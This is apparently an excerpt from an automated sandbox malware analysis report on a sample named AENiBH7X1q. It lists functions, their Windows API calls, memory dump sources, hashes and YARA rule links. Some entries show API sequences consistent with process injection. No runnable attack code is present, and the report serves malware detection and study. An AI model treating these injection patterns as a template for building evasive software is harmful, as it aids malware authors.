                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0538D2AD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 0538DA6B
                                                                                                                                                                                                                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0538DB01
                                                                                                                                                                                                                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0538DB23
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6af8220fbbe09b0ec308284c489047d5d2dd72d02bb54799f5ddac9511bdde25
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E612CE24E18658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A4E77A5F81CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateHeap
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 10892065-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                                                                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040116E Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00414E06 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wfsopen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 197181222-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040D900 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0538E2B0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0538E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8221d6210e3c6c1be91b1bd641982e13835dc43e92a327ef3bb88f4ff96ff1b3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EE0E67494020DEFDB00EFF4D5496AE7FB4EF04301F100161FD01D2280DA309D509A62

                                                                                                                                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047C08E Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 676windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$State$LongProcWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1562745308-4164748364
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004045E0 Relevance: 46.9, Strings: 35, Instructions: 3193COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
